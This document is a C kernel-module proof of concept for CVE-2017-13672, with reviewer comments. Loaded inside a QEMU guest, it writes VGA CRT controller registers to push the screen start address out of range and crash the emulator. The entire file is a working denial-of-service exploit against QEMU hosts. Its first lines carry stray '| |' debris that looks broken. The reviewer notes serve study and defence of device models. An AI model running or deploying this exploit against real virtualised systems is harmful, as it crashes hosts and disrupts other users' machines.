#define LINUX | |
#include <linux/module.h> | |
#include <linux/kernel.h> | |
#include <linux/init.h> | |
#include <asm/io.h> | |
#define DRIVER_AUTHOR	"David Buchanan"
#define DRIVER_DESC	"CVE-2017-13672 POC"

/*
 * I/O ports of the CRT controller index/data register pair.
 * From qemu/hw/display/vga_regs.h
 */
#define VGA_CRT_IC	0x3D4	/* CRT Controller Index - color emulation */
#define VGA_CRT_DC	0x3D5	/* CRT Controller Data Register - color emulation */

/*
 * CRT controller register indices written to VGA_CRT_IC.
 * From CL-GD5446 Technical Reference Manual
 */
#define VGA_CRC		0x0C	/* CRTC Screen Start Address High Register */
#define VGA_CRD		0x0D	/* CRTC Screen Start Address Low Register */
#define VGA_CR1B	0x1B	/* Extended Display Controls Register */
#define VGA_CR1D	0x1D	/* Overlay Extended Control Register */

/*
 * Register values captured by init_module() before it modifies them, kept so
 * that cleanup_module() can write the originals back on unload.
 * NOTE(review): these have external linkage; nothing in this file needs them
 * outside the translation unit, so `static` would keep them out of the
 * kernel's global namespace.
 */
unsigned char crc_bak;
unsigned char crd_bak;
unsigned char cr1b_bak;
unsigned char cr1d_bak;
/*
 * Read one CRT controller register.
 *
 * The register number is written to the index port (VGA_CRT_IC) and the
 * current value is then read from the data port (VGA_CRT_DC).
 *
 * @reg: CRT controller register index.
 * Return: the byte read from the data port.
 *
 * NOTE(review): the index port is left pointing at @reg and no lock is taken
 * here, so this can interleave with any other code in the guest that uses the
 * same index/data pair.
 */
unsigned char vga_crt_read(unsigned char reg)
{
	unsigned char value;

	outb_p(reg, VGA_CRT_IC);	/* select the register */
	value = inb_p(VGA_CRT_DC);	/* fetch its contents */

	return value;
}
/*
 * Write one CRT controller register.
 *
 * @val: byte to store.
 * @reg: CRT controller register index.
 *
 * Note the argument order: value first, register second, mirroring outb_p().
 * The index port (VGA_CRT_IC) is written before the data port (VGA_CRT_DC);
 * the order of the two port writes must not be swapped.
 *
 * NOTE(review): as with vga_crt_read(), nothing here serialises access to the
 * index/data pair against other users in the guest.
 */
void vga_crt_write(unsigned char val, unsigned char reg)
{
	/* select the target register, then store the new value */
	outb_p(reg, VGA_CRT_IC);
	outb_p(val, VGA_CRT_DC);
}
/*
 * Module entry point: runs once when the module is loaded into the guest
 * kernel.
 *
 * CVE-2017-13672 is publicly described as an out-of-bounds read in QEMU's VGA
 * display emulation during display update, which lets a privileged guest user
 * crash the QEMU process (denial of service). Loading a kernel module already
 * requires that level of privilege inside the guest.
 *
 * Sequence, in this order:
 *   1. save the current values of CRC, CRD, CR1B and CR1D into the *_bak
 *      globals so cleanup_module() can restore them;
 *   2. write 0xFF to both screen start address registers (CRC high, CRD low);
 *   3. OR 0x0D into CR1B and 0x80 into CR1D.
 *
 * NOTE(review): on the CL-GD5446 the bits set in step 3 appear to be the
 * extended screen start address bits, so together with step 2 the start
 * address is pushed to its highest value -- confirm against the manual.
 * The defensive point for a device model is that a guest-supplied start
 * address has to be bounded against the size of video memory before the
 * display refresh dereferences it.
 *
 * NOTE(review): the writes are unconditional. Nothing checks that the adapter
 * behind ports 0x3D4/0x3D5 is the emulated Cirrus device, so on any other
 * adapter this just corrupts the display configuration until unload.
 *
 * Return: always 0, so the module stays loaded and cleanup_module() runs on
 * unload.
 */
int init_module(void)
{
	unsigned char cr1b_new;
	unsigned char cr1d_new;

	printk(KERN_ALERT "Attempting to exploit CVE-2017-13672...\n");

	/* Snapshot the four registers before touching any of them. */
	crc_bak = vga_crt_read(VGA_CRC);
	crd_bak = vga_crt_read(VGA_CRD);
	cr1b_bak = vga_crt_read(VGA_CR1B);
	cr1d_bak = vga_crt_read(VGA_CR1D);

	/* Existing bits are kept; only the listed bits are added. */
	cr1b_new = cr1b_bak | 0x0D;
	cr1d_new = cr1d_bak | 0x80;

	vga_crt_write(0xFF, VGA_CRC);
	vga_crt_write(0xFF, VGA_CRD);
	vga_crt_write(cr1b_new, VGA_CR1B);
	/* usually only this bit needs to be set */
	vga_crt_write(cr1d_new, VGA_CR1D);

	return 0;
}
/*
 * Module exit point: runs when the module is unloaded.
 *
 * Reaching this function means the guest is still running, i.e. the emulator
 * did not crash. The four CRT controller registers changed by init_module()
 * are written back from the *_bak globals, in the same order they were saved
 * (CRC, CRD, CR1B, CR1D).
 *
 * NOTE(review): the printk() below carries no KERN_* level, so the kernel's
 * default log level applies, unlike the KERN_ALERT message in init_module().
 */
void cleanup_module(void)
{
	/* value/register pairs, listed in the order they are written back */
	const struct {
		unsigned char val;
		unsigned char reg;
	} saved[] = {
		{ crc_bak,  VGA_CRC  },
		{ crd_bak,  VGA_CRD  },
		{ cr1b_bak, VGA_CR1B },
		{ cr1d_bak, VGA_CR1D },
	};
	size_t i;

	printk("If you got this far, exploitation was unsuccessful. Attempting to unload CVE-2017-13672. This may or may not fix your graphics.\n");

	for (i = 0; i < sizeof(saved) / sizeof(saved[0]); i++)
		vga_crt_write(saved[i].val, saved[i].reg);
}
/*
 * Module metadata recorded in the built module.
 * "Dual MIT/GPL" is one of the licence strings the kernel accepts as
 * GPL-compatible, so loading this module should not taint the kernel on
 * licence grounds.
 */
MODULE_DESCRIPTION(DRIVER_DESC);
MODULE_AUTHOR(DRIVER_AUTHOR);
MODULE_LICENSE("Dual MIT/GPL");